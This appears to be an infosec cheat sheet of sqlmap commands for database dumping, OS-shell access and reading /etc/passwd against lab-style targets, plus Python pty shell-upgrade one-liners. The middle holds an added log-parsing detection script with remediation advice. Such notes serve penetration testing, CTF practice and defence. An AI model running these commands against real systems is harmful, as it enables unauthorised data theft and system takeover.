akde/infosec

Information security is ultimately about managing risk


Standard case:

$ python sqlmap.py -u http://10.10.10.140/index.php/catalogsearch/result/?q=e

More aggressive (higher --level and --risk widen the set of injection points and payloads tested):

$ python sqlmap.py -u http://10.10.10.140/index.php/catalogsearch/result/?q=e --level 5 --risk 3

Dump DB:

sqlmap -u http://target/command.php?id=564 --dbms=mysql --dump --threads=5
sqlmap -u http://target/command.php?id=564 --dbms=mysql --tables

Get shell:

sqlmap -u http://target/command.php?id=564 --dbms=mysql --os-shell

Use an existing HTTP request as a template, e.g. store a captured request in a text file:

POST /index.php HTTP/1.1
Header: value
...

Then point sqlmap at that request file (r.txt in the commands below):

sqlmap -r r.txt -p $nameOfTheVulnerableField
sqlmap -r r.txt --dbms mysql --technique=U --dump

Try to read a file:

sqlmap -u http://178.128.40.217:32711/portfolio.php?id=1 --file-read=/etc/passwd
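Seen from the other side of the wire, the commands above leave a recognisable trail in web server access logs: the default sqlmap User-Agent, boolean probes such as `AND 1=1`, `UNION ... SELECT` payloads, `SLEEP()` calls for time-based tests, and `LOAD_FILE()` for file reads. The following script is an added example, not part of this page or of sqlmap, that parses a few constructed combined-format log lines (the hosts, paths and timestamps are made up; the sqlmap User-Agent string follows the tool's default format) and groups suspicious requests by source IP.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in Apache/nginx "combined" log format (not real traffic).
# Paths echo the cheat-sheet commands above; the sqlmap User-Agent mirrors the
# tool's default format, which is sent unless --random-agent is used.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php/catalogsearch/result/?q=shoes HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [12/Mar/2024:10:01:05 +0000] "GET /command.php?id=564 HTTP/1.1" 200 812 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.9 - - [12/Mar/2024:10:01:06 +0000] "GET /command.php?id=564%20AND%201%3D1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /command.php?id=564%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:01:08 +0000] "GET /portfolio.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "GET /portfolio.php?id=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Payload shapes that map onto sqlmap's detection techniques (union, boolean,
# time-based) and its --file-read behaviour on MySQL. Matched against the
# URL-decoded query string so encoded spaces and parentheses do not hide them.
SQLI_PATTERNS = {
    "union-select": re.compile(r"\bUNION\b.+\bSELECT\b", re.I),
    "boolean-probe": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "time-based": re.compile(r"\b(SLEEP|BENCHMARK|WAITFOR)\b", re.I),
    "file-read": re.compile(r"\bLOAD_FILE\s*\(", re.I),
    "comment-tail": re.compile(r"(--|#)\s*$"),
}


def parse_line(line):
    """Return the fields we need from one combined-format line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    target = entry["target"]
    entry["query"] = unquote_plus(target.split("?", 1)[1]) if "?" in target else ""
    return entry


def classify(entry):
    """Return the sorted list of reasons a parsed request looks like SQLi probing."""
    reasons = []
    if "sqlmap" in entry["ua"].lower():
        reasons.append("sqlmap-user-agent")
    for name, pattern in SQLI_PATTERNS.items():
        if pattern.search(entry["query"]):
            reasons.append(name)
    return sorted(reasons)


def find_suspects(log_text, threshold=2):
    """Group flagged requests by source IP; keep sources at or above threshold hits."""
    per_ip = defaultdict(lambda: {"hits": 0, "reasons": set(), "paths": set()})
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if not reasons:
            continue
        rec = per_ip[entry["ip"]]
        rec["hits"] += 1
        rec["reasons"].update(reasons)
        rec["paths"].add(entry["target"].split("?", 1)[0])
    return {ip: rec for ip, rec in per_ip.items() if rec["hits"] >= threshold}


if __name__ == "__main__":
    for ip, rec in find_suspects(SAMPLE_LOG).items():
        print(f"{ip}: {rec['hits']} suspicious requests, "
              f"techniques={sorted(rec['reasons'])}, paths={sorted(rec['paths'])}")
```

The User-Agent check only catches default runs (sqlmap's `--random-agent` replaces it), so the payload patterns and the per-source count carry the detection; the paths the script collects tell you which parameters to fix first. The lasting fix is parameterized queries in the application, and running the web application's database account without the FILE privilege and with MySQL's `secure_file_priv` set limits what `--file-read` and `--os-shell` can reach even where an injection exists.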


python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';